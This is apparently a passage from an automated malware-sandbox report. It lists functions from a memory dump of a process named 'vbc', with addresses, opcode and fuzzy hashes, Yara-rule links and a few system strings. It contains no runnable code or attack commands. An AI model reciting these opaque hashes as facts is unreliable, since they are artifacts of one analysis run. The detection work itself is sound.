                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: EXT-
                                                                                    • API String ID: 0-1948896318
                                                                                    • Opcode ID: fda04fec9c1ba5cf0a4befc946c5dec90551e4e0b85341a4ae984f079e40bc1f
                                                                                    • Instruction ID: a77cb690bcbdcb5f1748082de172766898c6278f2df3340e1e7ecc6f3baf5c99
                                                                                    • Opcode Fuzzy Hash: fda04fec9c1ba5cf0a4befc946c5dec90551e4e0b85341a4ae984f079e40bc1f
                                                                                    • Instruction Fuzzy Hash: 47418076609341ABDB29DA78C884B6BBBECAF88718F48092DFD85D7140E674DD04C793
                                                                                    Function 0587CDEA Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AlternateCodePage
                                                                                    • API String ID: 0-3889302423
                                                                                    • Opcode ID: 13a988b50088cd50cd559d2e7aed49411dc92cc65e96f550fcdaa0a3e8cf0b86
                                                                                    • Instruction ID: 267357cc3c6ffb35c5570a9d855cbeeb6ecef47e315d3f45d254256f39738e31
                                                                                    • Opcode Fuzzy Hash: 13a988b50088cd50cd559d2e7aed49411dc92cc65e96f550fcdaa0a3e8cf0b86
                                                                                    • Instruction Fuzzy Hash: 54419176E00208AADF28DB98C884AFEF7F9FF44650F24415AEC16E7250D674DE41CBA1
                                                                                    Function 058FC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: BinaryHash
                                                                                    • API String ID: 0-2202222882
                                                                                    • Opcode ID: 26f8d04d0d34fe9ba55d8b218155a381e7a585507062847ebccd5c8907907744
                                                                                    • Instruction ID: 3e76056e52171630d3d2f01c3c75da6b01a0f13b2465d88c7715a1076b6e7645
                                                                                    • Opcode Fuzzy Hash: 26f8d04d0d34fe9ba55d8b218155a381e7a585507062847ebccd5c8907907744
                                                                                    • Instruction Fuzzy Hash: D24161B1E1462CAADB219A54DC85FDEB77CAB48714F0045E5EB08EB140DB309F898FA5
                                                                                    Function 058FCCA0 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: TrustedInstaller
                                                                                    • API String ID: 0-565535830
                                                                                    • Opcode ID: 9aee2792a1d022ffa69917019dd2fa1c24f402457b770012bdddb6c3863263bf
                                                                                    • Instruction ID: 254f2f8fd149415e47569917899c4f6c8e98d0957f4533307ee22d6a32596448
                                                                                    • Opcode Fuzzy Hash: 9aee2792a1d022ffa69917019dd2fa1c24f402457b770012bdddb6c3863263bf
                                                                                    • Instruction Fuzzy Hash: 0F315E32A44619BFDF26AA98CC45FFEBB79EB48650F050069AE00EB150D671DE41CB91
                                                                                    Function 05920F50 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    • API String ID: 0-2766056989
                                                                                    • Opcode ID: 82e9b14cf91a5a6f37c9e4009f2ae5fbb7a03b243ebd8f8edba72d545418d4d2
                                                                                    • Instruction ID: b0619b681061541fe619c5a21cedb443a65cc8edbb6bc255658a7aa08f2d5432
                                                                                    • Opcode Fuzzy Hash: 82e9b14cf91a5a6f37c9e4009f2ae5fbb7a03b243ebd8f8edba72d545418d4d2
                                                                                    • Instruction Fuzzy Hash: AD316D71158395AFD311DF14C849E9BBBE8FB84750F404A2EB5D582290EBB0E908CB92
                                                                                    Function 0591AEB0 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0591AF2F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                    • API String ID: 0-1911121157
                                                                                    • Opcode ID: 282b7bd298d58f0529b79830e195b8617a4756523cd123a961a8821e868c42f5
                                                                                    • Instruction ID: 282fd3792696cf7f80c3f1333015b96a15935d3f289cebd0c5e8c427d1309555
                                                                                    • Opcode Fuzzy Hash: 282b7bd298d58f0529b79830e195b8617a4756523cd123a961a8821e868c42f5
                                                                                    • Instruction Fuzzy Hash: 2C31D1B2A04618ABD711DB58CC45F6ABBB9FB84B10F118665F905E7780DB38AC00CB90
                                                                                    Function 058A8CB1 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: WindowsExcludedProcs
                                                                                    • API String ID: 0-3583428290
                                                                                    • Opcode ID: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                                                    • Instruction ID: 976587d59abb3f33bf7fe2dc4f4a57e2a61778ac5b1b2796373f46b14bf26214
                                                                                    • Opcode Fuzzy Hash: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                                                    • Instruction Fuzzy Hash: B4213A37605218ABEF22DA48C844F7BBB7DBF51694F09402ABD16DB104D634DD018BB0
                                                                                    Function 05936FF7 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • Critical error detected %lx, xrefs: 05937027
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Critical error detected %lx
                                                                                    • API String ID: 0-802127002
                                                                                    • Opcode ID: 8a92a37ca6717c417f1c3dab2d71c275f0a3a710c3879fbb39ed73b67e1917d5
                                                                                    • Instruction ID: 63863752eeb5ec353c1d6b241b7905f519319adb72a4fc18df12160c46bf8429
                                                                                    • Opcode Fuzzy Hash: 8a92a37ca6717c417f1c3dab2d71c275f0a3a710c3879fbb39ed73b67e1917d5
                                                                                    • Instruction Fuzzy Hash: A7118BB6E04308CBDB25DFA8C406BEDFBF1EB04714F20416AD565AB281D7751A01CF10
                                                                                    Function 05922000 Relevance: .8, Instructions: 757COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 82e39b6d56face78a9948b602772c1dce6e90d2fdc8cbd0518ddd5ac59600b38
                                                                                    • Instruction ID: 70e050a37ced48c5fefd5fd9cf6aa9d9c6de4c56807221a073a12cca42889afa
                                                                                    • Opcode Fuzzy Hash: 82e39b6d56face78a9948b602772c1dce6e90d2fdc8cbd0518ddd5ac59600b38
                                                                                    • Instruction Fuzzy Hash: ED42D23A6083519FDF25CF68C890A6FB7EABF88300F08092DF98687258D775D945CB52
                                                                                    Function 05918158 Relevance: .6, Instructions: 617COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6d69eb41842ef537b7ac72357f6c7189b85b1f964be72f49af4b6499896c6582
                                                                                    • Instruction ID: b13044dfbf0b567d62897816c36a8f203e7811d13c7684403262e251540639ec
                                                                                    • Opcode Fuzzy Hash: 6d69eb41842ef537b7ac72357f6c7189b85b1f964be72f49af4b6499896c6582
                                                                                    • Instruction Fuzzy Hash: 2D425C75E002299FEB24CF69C881BADB7F6BF48300F188599E849EB241DB349D81DF54
                                                                                    Function 0592A118 Relevance: .6, Instructions: 591COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 72860677d3f41cb2f0ca32f60f7ea3e5634f2713e203d47f48a48350771fa26b
                                                                                    • Instruction ID: 06c0d69753d0019b21f9016ad132c36dc488a5a20fae2632022241e182e494c0
                                                                                    • Opcode Fuzzy Hash: 72860677d3f41cb2f0ca32f60f7ea3e5634f2713e203d47f48a48350771fa26b
                                                                                    • Instruction Fuzzy Hash: 9C22C1726086718FDB24CF29C454776B7F6BF44300F08885AE8878F68AD7B5E492DB64
                                                                                    Function 058A8DBF Relevance: .6, Instructions: 554COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7e476cda9cb8d8658cb7f8c2103b3b01c97fd5151b220042835ae0644c958077
                                                                                    • Instruction ID: 7566e2824c0969c0c3fe38e2c8efed90864672536d0700f5161a555a27baf8a5
                                                                                    • Opcode Fuzzy Hash: 7e476cda9cb8d8658cb7f8c2103b3b01c97fd5151b220042835ae0644c958077
                                                                                    • Instruction Fuzzy Hash: 59222871E0421ADBDB15CF95C4809BEBBF6BF49304B15806AEC55EB241E734ED92CBA0
                                                                                    Function 058865D0 Relevance: .4, Instructions: 383COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5334b2aa7065f42cdf4cb6f9ce68d8bafd1e1e10ac76ac383c4e4411004fc527
                                                                                    • Instruction ID: 77632206d046346d9dfde346b3d5d190977128fcb7fc72bda27a197547eb0020
                                                                                    • Opcode Fuzzy Hash: 5334b2aa7065f42cdf4cb6f9ce68d8bafd1e1e10ac76ac383c4e4411004fc527
                                                                                    • Instruction Fuzzy Hash: 81E15B716083418FC714EF29C494A6ABBE1FF99304F058A6DE899CB351EB31ED05CB92
                                                                                    Function 05878397 Relevance: .4, Instructions: 380COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ea72f7dd34294a147b7e8c78f1d059410e687082f8e76ddae83b1e422021b31f
                                                                                    • Instruction ID: d47ef40f3f4b89a136edd848917e1e6f638247a6e44fc773ed8160568b151063
                                                                                    • Opcode Fuzzy Hash: ea72f7dd34294a147b7e8c78f1d059410e687082f8e76ddae83b1e422021b31f
                                                                                    • Instruction Fuzzy Hash: 0AD1B171A0020E9BCB14DF69C899ABEB3E6FF44248F058669ED56DB280E730DD40CF61
                                                                                    Function 058AEF28 Relevance: .3, Instructions: 347COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 09404797938959c50bfac8c6f906f48fbb557b17abb3114dd5d6f872b13cd21f
                                                                                    • Instruction ID: b898f22fd58ad6e07f99b4666d32996d47ae59835e513dfd5bfb2a052c16c14b
                                                                                    • Opcode Fuzzy Hash: 09404797938959c50bfac8c6f906f48fbb557b17abb3114dd5d6f872b13cd21f
                                                                                    • Instruction Fuzzy Hash: 9BE1E076E04608DFDB25DFA9C984AADBBF2BF48314F14456AEA46E7260D770AC41CF10
                                                                                    Function 0589CFE0 Relevance: .3, Instructions: 345COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d164e7502d802afea2d8535b077b4b094f74c1e85ae678be355efa3d1ffbac74
                                                                                    • Instruction ID: aba6946191a991ce54571b77fdd467eb770179d69a3206435b81f02fd8b07ead
                                                                                    • Opcode Fuzzy Hash: d164e7502d802afea2d8535b077b4b094f74c1e85ae678be355efa3d1ffbac74
                                                                                    • Instruction Fuzzy Hash: 96D1A431B063198FEF28DB29C894BA9B7B2FB45304F0840A9DD09EB251DB74AD85CF55
                                                                                    Function 05908243 Relevance: .3, Instructions: 322COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                    • Instruction ID: 18f7f4c16805cf38e90a4d3ac03b7b9197dd7571b162f899dbdf19a698fccc06
                                                                                    • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                    • Instruction Fuzzy Hash: F4B15C74B00608AFDF24DB99C944EABB7BAFF84344F145869E942EB7D0DA34E945CB10
                                                                                    Function 05890535 Relevance: .3, Instructions: 300COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                    • Instruction ID: e77964ead19e9d7849b5b7cdc4203a4db4ac2ff33c61461900893301a5733d0c
                                                                                    • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                    • Instruction Fuzzy Hash: E5B1E231704649EFDF19CBA8C858BBEB7B6AF85304F184154E956D7291DB30ED41CB90
                                                                                    Function 058A0DE1 Relevance: .3, Instructions: 295COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d1c7fdb4b1fbbac043931a2ad5fc30c605be7765584fcbebb9c64f7b12c0b41d
                                                                                    • Instruction ID: ad142c533a408a6214c01300f20367740e9685ce67c41708da357cca32d8c723
                                                                                    • Opcode Fuzzy Hash: d1c7fdb4b1fbbac043931a2ad5fc30c605be7765584fcbebb9c64f7b12c0b41d
                                                                                    • Instruction Fuzzy Hash: 02C14E71E04349DFEB18CF98C888AADBBB6FF49704F14412AE905EB245DB71AD41CB41
                                                                                    Function 058883C0 Relevance: .3, Instructions: 281COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: aec80ab534035c04964afdbf59d5fa70e6bec05ec1cd857c2c482c96412cc620
                                                                                    • Instruction ID: 5c06a095e256f3bbf25ec168fc0d8c98c6ec8607a423ba005823a2b7290df0df
                                                                                    • Opcode Fuzzy Hash: aec80ab534035c04964afdbf59d5fa70e6bec05ec1cd857c2c482c96412cc620
                                                                                    • Instruction Fuzzy Hash: 4DC124752083418FD764DF19C498BAAB7E5FF88304F44496DE98ADB290E774E908CF92
                                                                                    Function 0587C427 Relevance: .3, Instructions: 280COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 709c8af7a8c887759c418f090a5765a5c8b26fb4dfebb4c2aa33400e8b41df22
                                                                                    • Instruction ID: 0d809a78e0061ab5f1ee7e24e866b8448e1dc7535e253175a6a293d09efbdf9d
                                                                                    • Opcode Fuzzy Hash: 709c8af7a8c887759c418f090a5765a5c8b26fb4dfebb4c2aa33400e8b41df22
                                                                                    • Instruction Fuzzy Hash: 70B15F70B042598BDB24DF58C894BA9B3F6BF44704F1485E9D80AEB250EB71DD85CB25
                                                                                    Function 058AE5E7 Relevance: .3, Instructions: 278COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ec643b313a67aa30f073921b57483aa966a4ec318d974ca36980a331fbfaae56
                                                                                    • Instruction ID: df12108bb9cca385aadb9dff0f2c63bfce92ffae2e8c97025cffff0c2cd10633
                                                                                    • Opcode Fuzzy Hash: ec643b313a67aa30f073921b57483aa966a4ec318d974ca36980a331fbfaae56
                                                                                    • Instruction Fuzzy Hash: 56A11432E046189FEB21DB58C848FAEBBBABB45714F150965EE01EB2D0DB749D40CB91
                                                                                    Function 058C0185 Relevance: .3, Instructions: 276COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2be224c7c6dab85e870cbe285e1ccf1f97cd5e86ed8ec013b3ddcfcaae9f3790
                                                                                    • Instruction ID: ba6f3d25eac641a77e5b3ac82c1f3c44c1ddfd51f9a72f10652945c9ddc1bb63
                                                                                    • Opcode Fuzzy Hash: 2be224c7c6dab85e870cbe285e1ccf1f97cd5e86ed8ec013b3ddcfcaae9f3790
                                                                                    • Instruction Fuzzy Hash: B8A18E70B00619DBDB24DA69C994BBEBBA6FF44359F0040ADEE46D7281DB34EC11CB50
                                                                                    Function 05954500 Relevance: .3, Instructions: 275COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ccef32c50b4efcb82f4a28e6f3d8840121a50e732a14cb5dd694d06b06e581de
                                                                                    • Instruction ID: 61083b6807980712fb91cd539e4497e9e98ce6b1370f68d1591c74b6888f7b7b
                                                                                    • Opcode Fuzzy Hash: ccef32c50b4efcb82f4a28e6f3d8840121a50e732a14cb5dd694d06b06e581de
                                                                                    • Instruction Fuzzy Hash: 7BA1DF72604701AFCB55DF28C980B6ABBE9FF48714F440929F989DB250C734ED91CB92
                                                                                    Function 059060E0 Relevance: .3, Instructions: 264COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f4c50fe2466e028556f6435862e644288c0d711bf2e3cb2ef6274ba9444d6f32
                                                                                    • Instruction ID: bb8accb4b2b6d4f308ca4c6d39b59be96a708fcec1fc9aa740ba0c59c2ff2b86
                                                                                    • Opcode Fuzzy Hash: f4c50fe2466e028556f6435862e644288c0d711bf2e3cb2ef6274ba9444d6f32
                                                                                    • Instruction Fuzzy Hash: 4991B171E04219AFDF15CF68C884BBEBBB9EF48700F154969E900EB280D734ED108BA0
                                                                                    Function 0589E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dfe2c7f6b4cb9b20ea269626f80bc38dbc54940e725f6eb8971c447590bb1c7a
                                                                                    • Instruction ID: 4d40dea089ee02e4f0a6775cb918e75804f7f60ec85c94d466e7b8a2b46ad788
                                                                                    • Opcode Fuzzy Hash: dfe2c7f6b4cb9b20ea269626f80bc38dbc54940e725f6eb8971c447590bb1c7a
                                                                                    • Instruction Fuzzy Hash: CE91E271B04A19DBDB28EB68C844BBABBB6FF85714F094065EC06DB290EA74DD01C791
                                                                                    Function 05876D10 Relevance: .2, Instructions: 216COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c90595a46e5a98c6fc276b2ddf1c445697a7c63800cb331f8145e324145f2a44
                                                                                    • Instruction ID: 0fda1e7cced37c4753d466e44753a2ce4053390202d95d7cb303ffdb431c23ec
                                                                                    • Opcode Fuzzy Hash: c90595a46e5a98c6fc276b2ddf1c445697a7c63800cb331f8145e324145f2a44
                                                                                    • Instruction Fuzzy Hash: 23718D7560874AABDB20CF25C980F7AF7E9FB48254F04492AED56D7200E730ED44CBA2
                                                                                    Function 058BE284 Relevance: .2, Instructions: 212COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: de0caba1e346c4ee21bb93c0e716b68c4c418ed0a9758735d2fe98e358dbb202
                                                                                    • Instruction ID: 06bc51cd52d99cd144c8a3891c9e67377170581374a714b14ef97a980807b2b1
                                                                                    • Opcode Fuzzy Hash: de0caba1e346c4ee21bb93c0e716b68c4c418ed0a9758735d2fe98e358dbb202
                                                                                    • Instruction Fuzzy Hash: 12814E71A04609AFEB25CFA9C880BEEB7BAFF88354F104529E956E7350D770AC45CB50
                                                                                    Function 0589C640 Relevance: .2, Instructions: 206COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 119f21c2ce867a9d95b144a2b66f88107b757f52c83327116b3c5671b6a54557
                                                                                    • Instruction ID: ec991e97e03cf0630c20d5aa04162a30f802c71eb8aa9ba57b6573459f61cb97
                                                                                    • Opcode Fuzzy Hash: 119f21c2ce867a9d95b144a2b66f88107b757f52c83327116b3c5671b6a54557
                                                                                    • Instruction Fuzzy Hash: 2D71AE75905669EBCB29CF59D490BBEBBB5FF49710F18411AEC42EB250D7319C00CBA0
                                                                                    Function 05918D6B Relevance: .2, Instructions: 206COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 77ad55685040c5a57192620de02a61b669d1521b8d49cb39228e4aff357b2237
                                                                                    • Instruction ID: a74797dcbe0338b5bc2970e6d3fc03466cd9c7c6a9952e93cbe8687deb532fef
                                                                                    • Opcode Fuzzy Hash: 77ad55685040c5a57192620de02a61b669d1521b8d49cb39228e4aff357b2237
                                                                                    • Instruction Fuzzy Hash: F371C374A0426AAFCB14DF59C840ABABBF6FF45300F048459EC95DB301E335DA45D7A8
                                                                                    Function 059347A0 Relevance: .2, Instructions: 202COMMON
